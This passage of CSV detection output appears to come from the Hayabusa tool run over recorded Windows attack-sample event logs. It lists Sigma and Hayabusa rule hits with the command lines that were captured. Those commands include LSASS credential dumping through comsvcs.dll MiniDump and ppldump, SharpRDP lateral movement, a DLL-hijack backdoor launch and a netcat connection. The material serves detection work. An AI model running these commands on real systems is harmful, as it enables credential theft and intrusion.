Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning 
Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx +2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx +2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3461203602-4096304019-2269080069-501 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-20 : Group: 
Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\sqlsvc : Parent Command: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,informational,Logoff,User: ANONYMOUS LOGON : LogonID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,FileProtocolHandler ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,FileProtocolHandler ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,OpenURL ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,OpenURL ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /c start ms-browser:// : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c start 
ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: explorer ms-browser:// : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password : Path: C:\ProgramData\USOShared\SharpRDP.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Furutaka.exe dummy2.sys : Path: C:\Users\Public\BYOV\TDL\Furutaka.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: ppldump.exe -p lsass.exe -o a.png : Path: C:\Users\Public\BYOV\ZAM64\ppldump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Scheduled Task 
Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx +2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: usoclient StartInteractiveScan : Path: C:\Windows\System32\UsoClient.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session 
Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : 
User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: 
C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - 
Services Management : Command: sc stop CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc query CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program 